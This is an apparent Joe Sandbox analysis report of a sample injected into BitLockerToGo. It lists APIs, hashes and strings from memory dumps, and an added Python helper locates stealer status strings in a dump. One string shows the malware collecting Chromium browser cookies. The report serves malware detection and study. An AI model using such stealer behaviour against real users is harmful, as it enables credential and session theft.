                                                              • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 02CF93C3
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                              • API String ID: 621844428-4175449110
                                                              • Opcode ID: 556f86d43f6bacaa95bd35ab05fe7df330449d06582389873d60f8a33e3579b9
                                                              • Instruction ID: 903c73392fb8462b33d66d60b74c6bf97fc42abe81ac8f347e809be51757b17a
                                                              • Opcode Fuzzy Hash: 556f86d43f6bacaa95bd35ab05fe7df330449d06582389873d60f8a33e3579b9
                                                              • Instruction Fuzzy Hash: 2FF0967080C224C7CEC03BB7954476A7BA99F61309F000816DB8A83284EB34491DDEA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02D178ED
                                                              Strings
                                                              Similarity
                                                              • API ID: InstalledMemoryPhysicallySystem
                                                              • String ID: :h:
                                                              • API String ID: 3960555810-2449104794
                                                              • Opcode ID: 3d30108285ac59e905eeeebdb9006f49175de5d8e0aeb4c1627299dcabd8090c
                                                              • Instruction ID: 603caaca1fbd8dbe8b94e6d86838e1e30c06255c3925c99f2bc7116e18704cbe
                                                              • Opcode Fuzzy Hash: 3d30108285ac59e905eeeebdb9006f49175de5d8e0aeb4c1627299dcabd8090c
                                                              • Instruction Fuzzy Hash: C3D18D74245B808AE3358B39C454BA7FBE1BF56308F544A5DC4EA8BB92C739A805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: Y[
                                                              • API String ID: 1029625771-2541013558
                                                              • Opcode ID: 1f88b6617a4756d5f9d08a6db147c07de4b2769d373e5b304ebea855df4d63ef
                                                              • Instruction ID: 4cce3bb08da5b8b74cc0ddced50527534a58349fa3f532d0d14fc3539a518d82
                                                              • Opcode Fuzzy Hash: 1f88b6617a4756d5f9d08a6db147c07de4b2769d373e5b304ebea855df4d63ef
                                                              • Instruction Fuzzy Hash: D531EFB050A3419FD308CF14C5A471BFBE2FFD5228F288A0EE4A55B785C3749946CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: LJ
                                                              • API String ID: 1029625771-1839849906
                                                              • Opcode ID: 03b4cef53aa3210fb6fe5a68d11a907dc424e05d4e8a5603cdcb865a16b0d4fb
                                                              • Instruction ID: 38e90f2ac428fe128649fbfed505a7c63fb3511a4815cd43a463ea60839c7fcb
                                                              • Opcode Fuzzy Hash: 03b4cef53aa3210fb6fe5a68d11a907dc424e05d4e8a5603cdcb865a16b0d4fb
                                                              • Instruction Fuzzy Hash: D61167B46083429FD318CF11D0A075BBBE2EFC4348F18891DE49687381DB34C906CB8A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02D24DC4
                                                              Strings
                                                              Similarity
                                                              • API ID: InformationVolume
                                                              • String ID: \
                                                              • API String ID: 2039140958-2967466578
                                                              • Opcode ID: 3dffd09ca7c19716e8961cee48a4c6ecdaf71d5712e6d620e9409887ab8b643b
                                                              • Instruction ID: 99f5663b5fab83c8d92b0120720563f66c006a662328c30d6b2d3f67ccae9f2c
                                                              • Opcode Fuzzy Hash: 3dffd09ca7c19716e8961cee48a4c6ecdaf71d5712e6d620e9409887ab8b643b
                                                              • Instruction Fuzzy Hash: 03F092B6680301BBE728DF10EC62F5637A4A744744F24481DB286FB3C0D6F0BD648A59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000002B,00000000,00000000,A70BA501), ref: 02D11305
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000002B,00000000,?,?), ref: 02D11D46
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 1753d89517b9da23f4bc100a4674ee9b395608a1bea5a9272163d1bce2ad1037
                                                              • Instruction ID: b1bf9c551c63624ff3493eab30ea0d6bee2e69b438979eedaa0527fbe8dd2dfd
                                                              • Opcode Fuzzy Hash: 1753d89517b9da23f4bc100a4674ee9b395608a1bea5a9272163d1bce2ad1037
                                                              • Instruction Fuzzy Hash: B05177B02007449FDB298F15D8E0B167BB1FF86304F25859DDA9A9F38AD735E805CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02D07EAA
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02D07ED8
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 3e0725b5f78edf35683dd82e8065dff40b0b0ffceeaa76d0dea332da46c2e1bb
                                                              • Instruction ID: 3e06df044f30a51a8b9da50a0b5e893c37383c8db3fa9eddba8f10e295c88da7
                                                              • Opcode Fuzzy Hash: 3e0725b5f78edf35683dd82e8065dff40b0b0ffceeaa76d0dea332da46c2e1bb
                                                              • Instruction Fuzzy Hash: 6601D6729402057BD210AA14CC85F7777ADEB89764F040609BA559B3D1D770BD14CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 02D28E42
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 008c193c6d7aa2eed9e3bc29b6e39aa7727dd1d5bfebf79e7731e41b4df2baee
                                                              • Instruction ID: 044e7cd8ee2681954361371bd946cc60ca7aec094a2c8c84c5e43a5a0c5f25c6
                                                              • Opcode Fuzzy Hash: 008c193c6d7aa2eed9e3bc29b6e39aa7727dd1d5bfebf79e7731e41b4df2baee
                                                              • Instruction Fuzzy Hash: F4118E36A4A7C08FD7134A259C506C0BFB1EF6762470E85D7D4D5CBA63C2299C1ECB21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: d084e11b701623268a7db6d75a651e65e45db10048a96dc98b18080eb83bc65a
                                                              • Instruction ID: 9781671fdbd3dd29186d7e83c692c0ac8739161340a1c7977abffe937ae59ae5
                                                              • Opcode Fuzzy Hash: d084e11b701623268a7db6d75a651e65e45db10048a96dc98b18080eb83bc65a
                                                              • Instruction Fuzzy Hash: B6114471A5C3019FD308CF05E4A071ABBE2EBD5218F248E1DE49567744D774D916CF86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02D26B71
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 2f4a457d35532c4ce57818fff3891a63a4ab0283c78bf1b2e9b67f9f78b53adb
                                                              • Instruction ID: 7dc424b747fc9896874a09951e9381bcd7f0da12324533fc1771d97e4f6693ab
                                                              • Opcode Fuzzy Hash: 2f4a457d35532c4ce57818fff3891a63a4ab0283c78bf1b2e9b67f9f78b53adb
                                                              • Instruction Fuzzy Hash: E41158B05083419FD708CF05C8A0B6BBBA6EB84328F14891CE8A50B285D730DA15CBC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02D26C42
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 9825c720d41d3ac7a8e18eea48bf428a4d6a4004ab2f19f30d65ed516f859d31
                                                              • Instruction ID: 2e43c230841e21e7f9a8f41d62b42d91a39643433a9b67cab8193d2e34a06fbc
                                                              • Opcode Fuzzy Hash: 9825c720d41d3ac7a8e18eea48bf428a4d6a4004ab2f19f30d65ed516f859d31
                                                              • Instruction Fuzzy Hash: 52019CB0148380AFD304DF04D5A4B5BBBE1EB95318F508D1DE4A58B392C7B5D81ADB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                              • String ID: 2$@$A$C$F
                                                              • API String ID: 3829817484-361553157
                                                              • Opcode ID: a9d2778133181822cca66dba20762e31cf67e7af0829fc1b9c6be5e16ffe695b
                                                              • Instruction ID: 86ffdc501bc42e55722790f85dfa061c4811c3aee6c0d214a01e2232e76d2358
                                                              • Opcode Fuzzy Hash: a9d2778133181822cca66dba20762e31cf67e7af0829fc1b9c6be5e16ffe695b
                                                              • Instruction Fuzzy Hash: 05615DB4908741DFC721DF39D484716BFE0AB05324F048A99E8DA8FB96D334E845CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • guc{, xrefs: 02D06BD8
                                                              • w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02D06C99
                                                              • DttH, xrefs: 02D06B25
                                                              • sb b, xrefs: 02D06BCA
                                                              • `Web, xrefs: 02D06B41
                                                              • crvi, xrefs: 02D06BC3
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DttH$`Web$crvi$guc{$sb b$w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                              • API String ID: 0-351321908
                                                              • Opcode ID: 9f83f4bf49e8d49012204a6cdca15af13f87ce9e7978fd03c4fd3a93adfab061
                                                              • Instruction ID: eb92db285df76eb7a41ad863b33b8451b3694ce4e9a8ecf22dcab748f5bea497
                                                              • Opcode Fuzzy Hash: 9f83f4bf49e8d49012204a6cdca15af13f87ce9e7978fd03c4fd3a93adfab061
                                                              • Instruction Fuzzy Hash: B3A18EB0608B418BD325CF29C4D07A3BBE1AF56305F08895DD4D78BBA2D778E855CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
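The block above is the one entry in this listing with a human-readable stealer status string ("[info] collected cookies file of the chromium-based browser") and it names the dump it came from, with its load base ("Offset: 02CF0000"). As an added example, not code from the Joe Sandbox report or from the malware, the Python below does the same mapping by hand: it scans a raw region dump for that status string in both ASCII and UTF-16LE, converts each file offset into a virtual address using the stated base, and pulls the base out of the sandbox's dump filename. Assumptions: the dump is a contiguous image of the region starting at the stated base (which is how the report presents it), the fourth dot-separated field of the `.sdmp` name is that base (it matches 02CF0000 here), and `SAMPLE_DUMP` is constructed filler, not the real dump.

```python
"""
Map stealer status strings in a sandbox region dump back to virtual
addresses. Added example; not part of the Joe Sandbox report.
"""
import re

# Load base the report states for this dump ("Offset: 02CF0000").
DUMP_BASE = 0x02CF0000

# Status string seen in the Strings list of the report.
STATUS_STRINGS = [
    "[info] collected cookies file of the chromium-based browser",
]


def parse_base_from_dump_name(name):
    """Return the region base encoded in a Joe Sandbox .sdmp filename.

    Assumption: the fourth dot-separated field holds the base address
    (for the dump on this page it reads 0000000002CF0000).
    """
    fields = name.rsplit("/", 1)[-1].split(".")
    if len(fields) < 4:
        raise ValueError("unexpected dump filename layout: %r" % name)
    return int(fields[3], 16)


def build_patterns(strings):
    """Compile byte regexes for the ASCII and UTF-16LE forms of each string."""
    pats = []
    for s in strings:
        pats.append((s, "ascii", re.compile(re.escape(s.encode("ascii")))))
        pats.append((s, "utf-16le", re.compile(re.escape(s.encode("utf-16-le")))))
    return pats


def scan_dump(data, base=DUMP_BASE, strings=STATUS_STRINGS):
    """Return hits as dicts with string, encoding, file_offset and va.

    va = base + file_offset, valid because the dump is a contiguous
    image of the region that starts at `base`.
    """
    hits = []
    for s, enc, pat in build_patterns(strings):
        for m in pat.finditer(data):
            hits.append({
                "string": s,
                "encoding": enc,
                "file_offset": m.start(),
                "va": base + m.start(),
            })
    return sorted(hits, key=lambda h: h["file_offset"])


def scan_file(path):
    """Scan a real .sdmp, taking the base from its filename."""
    with open(path, "rb") as f:
        data = f.read()
    return scan_dump(data, base=parse_base_from_dump_name(path))


def format_hit(h):
    return "%08X  %-9s %s" % (h["va"], h["encoding"], h["string"])


# Constructed sample region: filler with the status string planted once
# as ASCII (at 0x100) and once as UTF-16LE further on.
SAMPLE_DUMP = (
    b"\x00" * 0x100
    + STATUS_STRINGS[0].encode("ascii") + b"\x00"
    + b"\x90" * 0x40
    + STATUS_STRINGS[0].encode("utf-16-le")
    + b"\x00" * 0x20
)

SAMPLE_DUMP_NAME = (
    "00000005.00000002.2531747935.0000000002CF0000"
    ".00000040.00000400.00020000.00000000.sdmp"
)

if __name__ == "__main__":
    base = parse_base_from_dump_name(SAMPLE_DUMP_NAME)
    for h in scan_dump(SAMPLE_DUMP, base=base):
        print(format_hit(h))
```

On a real dump, `scan_file("…/hcaresult_5_2_2cf0000_…sdmp")` gives the VA of each string instance; the addresses the IDA plugin prints as xrefs (02D06C99 above) are the instructions that reference the string, so expect your string VA to be nearby but not identical. Searching both encodings matters because the same message can sit in the region as a narrow literal and as a wide copy prepared for a Unicode API.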

                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02D018C4
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02D018F4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 10743d0a5dad989b2750749fa8ff7a3ec444d30737ddc039e795c219fb117e90
                                                              • Instruction ID: 7e33da95dbcdbddc5ef4e4fa5b93184a2fa08b9ec00f587176e9af4242cda566
                                                              • Opcode Fuzzy Hash: 10743d0a5dad989b2750749fa8ff7a3ec444d30737ddc039e795c219fb117e90
                                                              • Instruction Fuzzy Hash: 7F7116B1900B00AFD725CF24D8C4B63B3F9AB45314F144A1DE69A87791E770F909CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ONA@$R-,T$R-,T
                                                              • API String ID: 0-737641570
                                                              • Opcode ID: 98e3b1845b5e9b7f8360b826a6347ba6c7692fdcef601d41a14a35120e84a2b4
                                                              • Instruction ID: 04f7aa0ea6d4eefa86dc99671e3b5b956c2672470aa29531d8bc0816c37f954d
                                                              • Opcode Fuzzy Hash: 98e3b1845b5e9b7f8360b826a6347ba6c7692fdcef601d41a14a35120e84a2b4
                                                              • Instruction Fuzzy Hash: A5A199726143228BC714CE18C49076FB7E2FF98718F29891DE895AB391D335EC19CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$8
                                                              • API String ID: 0-46163386
                                                              • Opcode ID: 762baf9fdd3b50d36f1e7081748e2d901e45eb3f65d12f960c1ffeff520393c9
                                                              • Instruction ID: 6a83b78ad44cff7f93792b229fbf2063c46f7dc32cc48322be0aab536dd05eeb
                                                              • Opcode Fuzzy Hash: 762baf9fdd3b50d36f1e7081748e2d901e45eb3f65d12f960c1ffeff520393c9
                                                              • Instruction Fuzzy Hash: 058268716083419FD7A4CF18C880BAABBE2BFC8354F54891DFA898B391D775D944CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: HSOB$/Vw
                                                              • API String ID: 2994545307-2403524481
                                                              • Opcode ID: b171818b93e0c151c9d1dd17c80750a691e1290f128c9febeeb37d425df10377
                                                              • Instruction ID: 0a7a2cce9ac3bde7dd05d33d608d0603dbca0873df50bc60b14888cadc960fef
                                                              • Opcode Fuzzy Hash: b171818b93e0c151c9d1dd17c80750a691e1290f128c9febeeb37d425df10377
                                                              • Instruction Fuzzy Hash: 16528E70145B419FE339CF25D4907A7BBE2BF56308F188A5DC4EA8BB96C379A805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: 20f0ae947c9de8d60149f01f8b7366f2e0076d1ff3ae9fd79bef99b2a7dd1084
                                                              • Instruction ID: f5b5b92ed0749fe43f55906661c0d0b090c68d9129e146ac1106b8da0eb49fc9
                                                              • Opcode Fuzzy Hash: 20f0ae947c9de8d60149f01f8b7366f2e0076d1ff3ae9fd79bef99b2a7dd1084
                                                              • Instruction Fuzzy Hash: D102EFB5608340AFD714CE24F480B2BB7E6AFC4314F98896DE89587791D739ED09CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HSOB
                                                              • API String ID: 0-4264381521
                                                              • Opcode ID: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction ID: 97e3405b7109ff3fb1b9ba53b757603391b93a8112f26bea9e4d97ae5482aafc
                                                              • Opcode Fuzzy Hash: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction Fuzzy Hash: 61E15970145B419FE325CF35D0A07A3BBE2BF56308F588A5DD4EA4BB96C37AA805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HSOB
                                                              • API String ID: 0-4264381521
                                                              • Opcode ID: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction ID: 1c526ef66a16e23fb7c1bf3d073ce3177ad07ba81d463c768de9b978ccbd93bb
                                                              • Opcode Fuzzy Hash: 5d790471924d3237be1385a50382f06bb6f7eb06e06b97d12e11fa5e9c377e6a
                                                              • Instruction Fuzzy Hash: 28E15970145B419FE325CF35D0A07A3BBE2BF56308F588A5DD4EA4BB96C37AA805CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: by
                                                              • API String ID: 0-1674299033
                                                              • Opcode ID: aef1137fbeb0c5ac0e5857939cc4de517aa3f1b3cf7ae2afd7c5217d249d3ce8
                                                              • Instruction ID: 31f6b4d8538aefb1e2a13e774bb094f8f5505008c536fcad2ac1457c6eef65b6
                                                              • Opcode Fuzzy Hash: aef1137fbeb0c5ac0e5857939cc4de517aa3f1b3cf7ae2afd7c5217d249d3ce8
                                                              • Instruction Fuzzy Hash: 22C14575610B008BD7288F28C8A17A7B7F2FF85318F149A1CD5978BB91E775B906CB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hFt:
                                                              • API String ID: 0-647926978
                                                              • Opcode ID: ea43ffd8880e3839421b65b1217c509a9418c4d6b664bc2a36f3bfedefa55172
                                                              • Instruction ID: 7a944561ee0dce13757e6eef1515d968766e7d09267f590c4a24d6bab36ca08f
                                                              • Opcode Fuzzy Hash: ea43ffd8880e3839421b65b1217c509a9418c4d6b664bc2a36f3bfedefa55172
                                                              • Instruction Fuzzy Hash: 00B12671201B818BD338CB399451767FBE6BF96204F298A5DC4EB8BB81D338E945CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ONA@
                                                              • API String ID: 0-126421097
                                                              • Opcode ID: baeb3280573f326fd6bffde631ac0ce667e36fea3dd37b3862607428ddb988bd
                                                              • Instruction ID: 478d980733222e0d4ea66d3fd34ee4f3ecdd9d6d5071f837057366139802dff6
                                                              • Opcode Fuzzy Hash: baeb3280573f326fd6bffde631ac0ce667e36fea3dd37b3862607428ddb988bd
                                                              • Instruction Fuzzy Hash: 2BA186716183129BD724CE28C490B6FB7E2FF94358F16891DE8859B361E770EC49CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,
                                                              • API String ID: 0-3772416878
                                                              • Opcode ID: b589b540072d4ecd545d5a7a5898c68722d8a0c14c3a497ce803925b6980678d
                                                              • Instruction ID: 951cfbb9ee064250763d5f09ea4453e1ed8d17b8556886c8db6018cd2aec91f1
                                                              • Opcode Fuzzy Hash: b589b540072d4ecd545d5a7a5898c68722d8a0c14c3a497ce803925b6980678d
                                                              • Instruction Fuzzy Hash: 7EB158711093819FD354CF68C88075AFBE4AFA9308F544A6DF5D897382C371EA18CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &%
                                                              • API String ID: 0-3372434844
                                                              • Opcode ID: 0b85a6595600f16e343c55cb75a2aaecbdf1df6bc0cfaa04868ebee61338d548
                                                              • Instruction ID: 19d0b448d5ff730f5ead56127644b44c846c53b3bce725e4f643035b966b72f4
                                                              • Opcode Fuzzy Hash: 0b85a6595600f16e343c55cb75a2aaecbdf1df6bc0cfaa04868ebee61338d548
                                                              • Instruction Fuzzy Hash: 317141B05083409FD324CF29C49075BBBE1FF85758F209A1DE9A99B3A1D374D908CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kX_c
                                                              • API String ID: 0-1179951471
                                                              • Opcode ID: 533d87587488c4330882c609f1ff06ecdf8077c65272c43bba28370ea5907750
                                                              • Instruction ID: 196ee833ab50afa4f5ff8ba4373620218d174dea1a81ee8f0491493e9f5ee536
                                                              • Opcode Fuzzy Hash: 533d87587488c4330882c609f1ff06ecdf8077c65272c43bba28370ea5907750
                                                              • Instruction Fuzzy Hash: 79514B70106F918ED72ACF34D9A07A7BBE1AF02246F48189CC4EB8B686D735B605CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kX_c
                                                              • API String ID: 0-1179951471
                                                              • Opcode ID: 0afae2454d77b443957dce1dd2230c305ab477af7912d9178664590f9ba7167b
                                                              • Instruction ID: 7bfd22d960277021230af1fe10a66850f745565f864adbba9d336fb4d0044e35
                                                              • Opcode Fuzzy Hash: 0afae2454d77b443957dce1dd2230c305ab477af7912d9178664590f9ba7167b
                                                              • Instruction Fuzzy Hash: 68614A70106F818ED729CF24D9A07A7BBE1AF02246F48199DC4EB8B386D779B605CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kX_c
                                                              • API String ID: 0-1179951471
                                                              • Opcode ID: d2e957d215e90b192e7c729951d5b6c3424b0d1a2ed6b5bf0776cd03391b75c9
                                                              • Instruction ID: 61541fc45f62e3920b7edcef40cd4c223b92fabbdfcff4efe150638899743313
                                                              • Opcode Fuzzy Hash: d2e957d215e90b192e7c729951d5b6c3424b0d1a2ed6b5bf0776cd03391b75c9
                                                              • Instruction Fuzzy Hash: 2E414770105F818AD72ACF38D9907A7BBE1AF06246F44189CC4EB8B786C735B605CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8
                                                              • API String ID: 0-4194326291
                                                              • Opcode ID: 95b3c9c87028eb14cea58240f0f43c0a9495de390a54595e6c445cfc91740dce
                                                              • Instruction ID: 01b6803bfc80bf77d99318a07ec1b635fd79e9a38d11e68c39e1548f42d5ead9
                                                              • Opcode Fuzzy Hash: 95b3c9c87028eb14cea58240f0f43c0a9495de390a54595e6c445cfc91740dce
                                                              • Instruction Fuzzy Hash: 2A3104B08183919BD710CF54E4A436FBBA6AFC6308F98091DE9815B781D339D904CBD3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b3484146926eacc29ab87b0752c6682971377b9ed03794b3d069aa3772130e4
                                                              • Instruction ID: c486140ee032582b482201e0006cd038a87775d81ebafa7f36fd77c5b04d3367
                                                              • Opcode Fuzzy Hash: 1b3484146926eacc29ab87b0752c6682971377b9ed03794b3d069aa3772130e4
                                                              • Instruction Fuzzy Hash: 2242D2316087128BC7A5DF18D8807BAB3E1FFC4318F194A2DDAC697285E334EA55CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
